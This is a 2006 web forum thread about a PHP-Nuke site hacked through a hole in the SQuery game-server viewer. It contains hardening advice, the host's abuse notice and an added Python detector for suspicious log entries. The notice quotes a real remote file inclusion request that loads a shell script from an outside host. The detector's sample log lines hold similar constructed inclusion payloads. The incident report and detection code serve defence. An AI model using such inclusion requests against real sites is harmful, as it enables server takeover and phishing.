Author |
Message |
swisschese
New Member
Joined: Jun 30, 2006
Posts: 21
|
Posted:
Thu Sep 07, 2006 6:08 pm |
|
Any tips?
[EDIT: image removed]
Anyone had this happen?
Thanks, I don't think that the forums are up to date. |
|
|
|
|
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY
|
Posted:
Thu Sep 07, 2006 7:26 pm |
|
There are many threads that you can consult here. Without further information there is little we can do. Nuke version? Forums version? Running Sentinel or not and what version? Have you looked in the logs? Any "third party" modules that let people upload? |
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6432
|
Posted:
Thu Sep 07, 2006 7:28 pm |
|
Install NukeSentinel, and put admin authentication on your admin.php file and modules/Forums/admin directory (search the forums here for specific instructions).
Check for any changed files, check your database. Change your control panel and nuke database passwords, which should be different.
I'll remove the picture from your post - there's no need to display offensive materials. |
_________________ I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG |
|
|
|
swisschese
|
Posted:
Thu Sep 07, 2006 7:49 pm |
|
Nuke : Raven's RavenNuke76 v2.02.02 Distro
Forums: phpBB 2.0.20. ( Not sure how to update )
Sentinel yes, NukeSentinel(tm) 2.4.2pl5
Logs, oh yeah, lots of IPs
Nothing to upload as far as I know! |
|
|
|
|
kguske
|
Posted:
Thu Sep 07, 2006 7:52 pm |
|
What about admin authentication on admin.php and modules/Forums/admin? |
|
|
|
|
swisschese
|
Posted:
Thu Sep 07, 2006 7:55 pm |
|
I think it's broke...
My user login is gone... bleh |
|
|
|
|
floppydrivez
Involved
Joined: Feb 26, 2006
Posts: 340
Location: Jackson, Mississippi
|
Posted:
Thu Sep 07, 2006 8:05 pm |
|
If you can get into cpanel, here are the instructions to password protect your forum admin folder.
admin_auth can be found here (under Apache is compiled as CGI, what more can I do?)
and probably a few other places on the forums.
|
_________________ Phpnuke Downloads, Clan Themes, Mack Hankins |
|
|
|
FireATST
RavenNuke(tm) Development Team
Joined: Jun 12, 2004
Posts: 654
Location: Ohio
|
Posted:
Sat Sep 09, 2006 8:49 pm |
|
Upgrade your Sentinel to the latest... |
|
|
|
|
swisschese
|
Posted:
Mon Sep 11, 2006 10:58 pm |
|
From:
To:
Subject: C54836102 - 1&1 Internet Compliance -- Account Warning - Hacked
Date: Mon, 11 Sep 2006 08:16:04 -0400
>Dear Swiss Chese,
>
>It has come to our attention that your web space has been hacked and
>used to host a phishing site at
>http://www.xtremeidiots.com/www.paypal.com.webscr.phpcmd=LogIn//:
>
>access.log.36.gz:86.126.57.95 - - [10/Sep/2006:10:29:41 -0400] "GET
>/SQuery/lib/armygame.php?libpath=http://www.freewebtown.com/k
>aizenngo5/hack/shell.php.txt? HTTP/1.1" 200 6255
>"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1
>; .NET CLR 1.1.4322)" "-"
>
>--
>
>The above was taken from your access logs. It shows that
>/SQuery/lib/armygame.php was used to perpetrate the hack.
>
>Please contact the developers for this script/application. You will
>likely need to install a version update and/or security patch to prevent
>further abuse.
>
>Also, reply to this email in acknowledgement of this issue. Failure to
>do so can result in your account being locked and possibly terminated.
>
>--
>Sincerely,
>Customer Compliance Operative
>1&1 Internet Inc.
I got hacked because of a server viewer that I had.
Thank you for all the help... let this be a warning to all:
SQUERY 4.0 game server viewer does have big security holes!!! |
|
|
|
|
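Added example (not part of the original thread and not any poster's or the host's code): a Python check that does what the host's log excerpt above does by hand, flagging access-log requests in which a query parameter's value is itself an absolute URL, as with libpath. The sample lines, IP addresses and the remote.example host are constructed, and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined-log request line; tolerates a "file:" prefix left by grep (IPv4 only).
LINE_RE = re.compile(
    r'^(?:[^\s:]+:)?(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute URL is the inclusion indicator.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)

def find_remote_include_requests(lines):
    """Return (ip, timestamp, path, param, value, status) per suspicious request."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoding.
            decoded = unquote(value)
            if REMOTE_RE.match(value) or REMOTE_RE.match(decoded):
                hits.append((m.group("ip"), m.group("ts"), url.path,
                             name, decoded, int(m.group("status"))))
    return hits

# Constructed sample lines, modelled on the excerpt in the host's e-mail.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Sep/2006:10:20:01 -0400] '
    '"GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0" "-"',
    'access.log.36.gz:203.0.113.9 - - [10/Sep/2006:10:29:41 -0400] '
    '"GET /SQuery/lib/armygame.php?libpath=http://remote.example/x.txt? '
    'HTTP/1.1" 200 6255 "-" "Mozilla/4.0" "-"',
    '198.51.100.7 - - [10/Sep/2006:10:31:12 -0400] '
    '"GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 7301 "-" "Mozilla/4.0" "-"',
    '203.0.113.9 - - [10/Sep/2006:10:33:05 -0400] '
    '"GET /index.php?page=%2568ttp%253A%252F%252Fremote.example%252Fx.txt '
    'HTTP/1.1" 404 312 "-" "Mozilla/4.0" "-"',
]

if __name__ == "__main__":
    for ip, ts, path, name, value, status in find_remote_include_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {path} {name}={value} status={status}")
```

A hit with status 200 means the script was actually served, so those entries are the ones to trace first when checking for changed or added files.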
swisschese
|
Posted:
Tue Sep 12, 2006 3:28 am |
|
I know there is no way I can upload the 2 files that I found on my comp, but it looks like a method that they are using to crack the adminhttp... If any admin would like to take a look at it, please let me know and I will send the 2 PHP files over to them to help make this more secure.
Thanks
SwisS |
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
Posted:
Tue Sep 12, 2006 6:35 am |
|
swisschese, they got in through SQuery. Once "in" at the server level, HTTPAuth will not help you...
I would suggest signing up for the Secunia Advisory service. SQuery was addressed here. An invaluable service for the webmaster. No guarantee they will cover every script, but just another resource.
Like I always say "your site is only as secure as its weakest link". It can be exhausting at times trying to keep up. |
_________________ Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... |
|
|
|
|